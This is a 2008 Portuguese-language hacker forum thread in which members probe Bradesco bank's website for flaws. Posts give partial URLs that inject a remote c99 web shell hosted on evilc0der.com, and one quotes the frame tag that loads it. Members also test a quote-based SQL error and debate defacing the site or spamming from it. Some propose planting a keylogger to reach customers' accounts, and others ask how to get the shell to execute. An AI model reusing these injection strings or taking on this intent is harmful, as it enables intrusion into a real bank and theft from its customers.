Bradesco vul? :P

vaikarai · 26 de Junho , 2008, 05:01:01 PM

http://www.bradesco.com.br/indexpf.phtm ... om/c99.txt?
:/

vaikarai · 26 de Junho , 2008, 05:04:22 PM

Melhor fazer spam ou um deface?
http://www.bradesco.com.br/indexpf.phtm ... config.php?
vaikarai info
Hacker banker

vaikarai · 26 de Junho , 2008, 05:06:00 PM

desculpe tive que apagar pq o deface vai ser meu xD

Wuefez · 26 de Junho , 2008, 05:18:00 PM

Exatamente como eu tinha dito no outro topico, o Bradesco é vulnzão sim...

Mas caso você não tenha percebido lol, o script não chega a ser processado pelo server deles:

Código Selecionar

<frame src="http://www.evilc0der.com/c99.txt?" name="conteudo" id="conteudo" frameborder="0" scrolling="auto" noresize marginwidth="0" marginheight="0">

HEHEHHEHEH

Ilmo. Sr. JulianoRossi · 26 de Junho , 2008, 05:22:49 PM

Eita, pô!!

Hauhauhauhauhauhauhauhau
E eu aqui pensando que meu banco era seguro...
... deu até vergonha agora. hauhauhauhauhauhauhau

Abraços.

vaikarai · 26 de Junho , 2008, 05:29:36 PM

Citação de: "Wuefez"Exatamente como eu tinha dito no outro topico, o Bradesco é vulnzão sim...

Mas caso você não tenha percebido lol, o script não chega a ser processado pelo server deles:
Código Selecionar Expandir
<frame src="http://www.evilc0der.com/c99.txt?" name="conteudo" id="conteudo" frameborder="0" scrolling="auto" noresize marginwidth="0" marginheight="0">
HEHEHHEHEH

E isso eu reparei agora.. mais os adiministrador do banco era pra ter mais responsabilidade pq caso um site desse seja invadido o hacker mal intencionado pode por um auto infect na tela principal e infectar varios cliente e com isso tendo acesso as conta bancrias...

vaikarai · 26 de Junho , 2008, 05:39:24 PM

Erro

http://institucional.bradesco.com.br/Ne ... t.aspx?h='\\

Mateus · 26 de Junho , 2008, 05:46:24 PM

para o bem de todos e felicidade geral da nação, por favor quando mandar os links mande através de um webproxy, tipo assim

http://250.eu/surf.php?q=aHR0cDovL2luc3 ... %3D&hl=3ed

psycho · 26 de Junho , 2008, 05:54:16 PM

Consertaram né?!
Com uma falha dessa
entrando no servidor
era só colocar em applet
plugin do keylogger e
fazer a festa

ÐλяkFeλя · 26 de Junho , 2008, 05:55:11 PM

Eita nos, nao estamos tento banco seguro mais nao :o

Wuefez · 26 de Junho , 2008, 05:56:40 PM

Citação de: "vaikarai"Erro

http://institucional.bradesco.com.br/Ne ... t.aspx?h='\\

O script do cara converte a string pra numero (int) antes de jogar na consulta ao banco de dados...

Como a conversão não funciona, ele joga esse erro e mata o script a partir desse ponto...

psycho · 26 de Junho , 2008, 06:08:42 PM

Bora fazer alguma coisa nessa falha ae

#phobia · 26 de Junho , 2008, 06:28:54 PM

lol mesmo! rsrs

PenTest nos bancos agora? ^^

Lamentável isso...
Um "profissional" responsável pela segurança de sites bancário deixando falhas como essas...
A da caixa nem se comenta, já virou festa! o/

Tsc tsc...

kOrTcX · 26 de Junho , 2008, 06:30:13 PM

Citação de: "psycho"Bora fazer alguma coisa nessa falha ae

Como foi dito o servidor não está processando \o/

BiLL · 26 de Junho , 2008, 06:39:13 PM

Citação de: "psycho"Bora fazer alguma coisa nessa falha ae :P

mais tipo assim se ninguem mais souber dessa falha, mais somente o DK isso sera muito bom pra nossa reputaçao lol

Citação de: "kortcx"Como foi dito o servidor não está processando \o/

sera q naum tem como fazer ele processar naum?